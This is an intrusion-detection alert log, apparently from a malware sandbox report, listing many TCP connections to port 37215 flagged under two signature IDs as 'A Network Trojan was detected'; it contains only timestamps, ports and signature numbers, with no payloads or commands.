          Timestamp:06/08/24-15:05:21.021406
          SID:2829579
          Source Port:52970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041414
          SID:2835222
          Source Port:43080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.058193
          SID:2835222
          Source Port:40824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020518
          SID:2829579
          Source Port:44182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.154071
          SID:2829579
          Source Port:42986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014914
          SID:2835222
          Source Port:37146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017176
          SID:2835222
          Source Port:38670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731746
          SID:2835222
          Source Port:49144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817540
          SID:2835222
          Source Port:45926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112081
          SID:2829579
          Source Port:41776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153642
          SID:2829579
          Source Port:47130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.815455
          SID:2835222
          Source Port:57794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173807
          SID:2829579
          Source Port:59162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512047
          SID:2835222
          Source Port:59422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274561
          SID:2829579
          Source Port:52116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159225
          SID:2829579
          Source Port:57714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108273
          SID:2835222
          Source Port:46194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.892499
          SID:2835222
          Source Port:40930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709373
          SID:2829579
          Source Port:52518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895873
          SID:2829579
          Source Port:60872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.472134
          SID:2829579
          Source Port:32782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162744
          SID:2829579
          Source Port:52528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021926
          SID:2829579
          Source Port:52636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738457
          SID:2829579
          Source Port:47316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732574
          SID:2829579
          Source Port:56340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.165559
          SID:2829579
          Source Port:52002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155243
          SID:2829579
          Source Port:43632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352264
          SID:2835222
          Source Port:59848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.744392
          SID:2835222
          Source Port:59452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857880
          SID:2835222
          Source Port:50476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044044
          SID:2835222
          Source Port:45896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406871
          SID:2829579
          Source Port:50688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.178492
          SID:2835222
          Source Port:55752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550931
          SID:2829579
          Source Port:41486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741781
          SID:2835222
          Source Port:59136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.822360
          SID:2829579
          Source Port:44470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897366
          SID:2835222
          Source Port:41052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739135
          SID:2829579
          Source Port:37778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.172824
          SID:2829579
          Source Port:49796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854031
          SID:2835222
          Source Port:41870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036345
          SID:2835222
          Source Port:56090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273591
          SID:2835222
          Source Port:48982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783629
          SID:2835222
          Source Port:58176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044083
          SID:2835222
          Source Port:45194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786976
          SID:2829579
          Source Port:33904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.595130
          SID:2835222
          Source Port:50230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188866
          SID:2835222
          Source Port:39096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152402
          SID:2829579
          Source Port:39932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067679
          SID:2829579
          Source Port:59708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.898143
          SID:2829579
          Source Port:41982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.440727
          SID:2829579
          Source Port:39134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.515935
          SID:2835222
          Source Port:38932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.159194
          SID:2829579
          Source Port:44910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158296
          SID:2829579
          Source Port:50192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179666
          SID:2829579
          Source Port:41578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.192412
          SID:2829579
          Source Port:58442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549957
          SID:2835222
          Source Port:49294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264393
          SID:2829579
          Source Port:39730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467480
          SID:2835222
          Source Port:34326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113800
          SID:2835222
          Source Port:48828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152335
          SID:2829579
          Source Port:57626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.803321
          SID:2829579
          Source Port:52896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894732
          SID:2835222
          Source Port:34668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.268576
          SID:2835222
          Source Port:57014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730693
          SID:2835222
          Source Port:59966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.062877
          SID:2829579
          Source Port:52568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793323
          SID:2835222
          Source Port:46222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891776
          SID:2835222
          Source Port:53252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673578
          SID:2829579
          Source Port:34560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897000
          SID:2835222
          Source Port:34280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174272
          SID:2835222
          Source Port:56802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177687
          SID:2835222
          Source Port:42432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.015956
          SID:2835222
          Source Port:47676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016907
          SID:2835222
          Source Port:53014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019231
          SID:2835222
          Source Port:34748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800798
          SID:2829579
          Source Port:44492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511692
          SID:2829579
          Source Port:56714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743278
          SID:2835222
          Source Port:42642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599760
          SID:2835222
          Source Port:59150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021153
          SID:2835222
          Source Port:55620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.156023
          SID:2829579
          Source Port:53982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107902
          SID:2829579
          Source Port:53166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378468
          SID:2835222
          Source Port:33166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.834427
          SID:2835222
          Source Port:39624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739970
          SID:2835222
          Source Port:41874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274706
          SID:2835222
          Source Port:60460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108460
          SID:2829579
          Source Port:56224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857595
          SID:2829579
          Source Port:34596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549525
          SID:2835222
          Source Port:39138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743775
          SID:2835222
          Source Port:54406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897037
          SID:2835222
          Source Port:60288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704315
          SID:2835222
          Source Port:48978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016189
          SID:2829579
          Source Port:57608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817226
          SID:2835222
          Source Port:38838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.821046
          SID:2829579
          Source Port:52590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.800251
          SID:2829579
          Source Port:55494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673007
          SID:2829579
          Source Port:52492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734347
          SID:2835222
          Source Port:35616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176184
          SID:2829579
          Source Port:54714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510159
          SID:2835222
          Source Port:55506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.153170
          SID:2835222
          Source Port:56738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781558
          SID:2835222
          Source Port:54168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.469558
          SID:2829579
          Source Port:46822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783420
          SID:2829579
          Source Port:42764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798913
          SID:2829579
          Source Port:33164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895570
          SID:2835222
          Source Port:34428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269366
          SID:2835222
          Source Port:55696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160677
          SID:2829579
          Source Port:58062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732279
          SID:2835222
          Source Port:34718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.863172
          SID:2835222
          Source Port:56832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465518
          SID:2829579
          Source Port:48200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707898
          SID:2829579
          Source Port:49834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178801
          SID:2835222
          Source Port:56026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897171
          SID:2829579
          Source Port:58878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.084684
          SID:2829579
          Source Port:45252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.174738
          SID:2835222
          Source Port:52920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.902021
          SID:2829579
          Source Port:42530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792040
          SID:2829579
          Source Port:39302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.158897
          SID:2829579
          Source Port:34328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160644
          SID:2829579
          Source Port:47716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888539
          SID:2829579
          Source Port:51938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743758
          SID:2829579
          Source Port:38266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.350882
          SID:2829579
          Source Port:58382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788493
          SID:2835222
          Source Port:37562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188091
          SID:2829579
          Source Port:45816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005562
          SID:2835222
          Source Port:51488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179157
          SID:2835222
          Source Port:38082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.898076
          SID:2835222
          Source Port:48154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512328
          SID:2829579
          Source Port:37888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446603
          SID:2829579
          Source Port:54554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.545694
          SID:2835222
          Source Port:41632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730665
          SID:2835222
          Source Port:35080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115445
          SID:2829579
          Source Port:53336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044171
          SID:2835222
          Source Port:37288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173202
          SID:2835222
          Source Port:57056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160393
          SID:2835222
          Source Port:51736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857084
          SID:2835222
          Source Port:36744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554518
          SID:2829579
          Source Port:59904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673180
          SID:2829579
          Source Port:33752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739408
          SID:2835222
          Source Port:48140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.804323
          SID:2829579
          Source Port:51368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806191
          SID:2835222
          Source Port:53068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781790
          SID:2835222
          Source Port:38364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355294
          SID:2835222
          Source Port:47476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.450024
          SID:2835222
          Source Port:38788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.861317
          SID:2829579
          Source Port:41746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352509
          SID:2835222
          Source Port:59740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.862255
          SID:2829579
          Source Port:39256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.595099
          SID:2835222
          Source Port:34508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739779
          SID:2829579
          Source Port:38224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734897
          SID:2829579
          Source Port:38540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.162634
          SID:2835222
          Source Port:50700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.901825
          SID:2829579
          Source Port:38742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151137
          SID:2835222
          Source Port:51908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240496
          SID:2835222
          Source Port:36242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.846245
          SID:2829579
          Source Port:39594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.470702
          SID:2835222
          Source Port:34974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113702
          SID:2829579
          Source Port:35928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396221
          SID:2835222
          Source Port:42898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159232
          SID:2829579
          Source Port:34616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241634
          SID:2835222
          Source Port:37728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405478
          SID:2829579
          Source Port:35858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.881264
          SID:2829579
          Source Port:46158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179528
          SID:2829579
          Source Port:38330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857391
          SID:2835222
          Source Port:55130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.604662
          SID:2835222
          Source Port:57806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740450
          SID:2835222
          Source Port:48700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788936
          SID:2829579
          Source Port:59508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.150862
          SID:2835222
          Source Port:36412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406138
          SID:2829579
          Source Port:55926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173608
          SID:2835222
          Source Port:41790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.159025
          SID:2829579
          Source Port:40082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.842046
          SID:2835222
          Source Port:33284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495817
          SID:2835222
          Source Port:45658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159976
          SID:2835222
          Source Port:47028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745832
          SID:2829579
          Source Port:40224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175495
          SID:2835222
          Source Port:46618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.066177
          SID:2829579
          Source Port:57566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.192465
          SID:2829579
          Source Port:47630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467134
          SID:2835222
          Source Port:52358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.146989
          SID:2835222
          Source Port:36568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352451
          SID:2835222
          Source Port:44694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130076
          SID:2835222
          Source Port:39646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446185
          SID:2829579
          Source Port:48558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739277
          SID:2835222
          Source Port:43580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270314
          SID:2829579
          Source Port:56002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744858
          SID:2835222
          Source Port:58398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704543
          SID:2829579
          Source Port:44088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550945
          SID:2835222
          Source Port:37706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.302610
          SID:2829579
          Source Port:46700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706455
          SID:2829579
          Source Port:53506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115796
          SID:2829579
          Source Port:41348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.106285
          SID:2835222
          Source Port:40116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730933
          SID:2829579
          Source Port:58092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465308
          SID:2829579
          Source Port:48936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733675
          SID:2829579
          Source Port:44202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782987
          SID:2829579
          Source Port:44866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786858
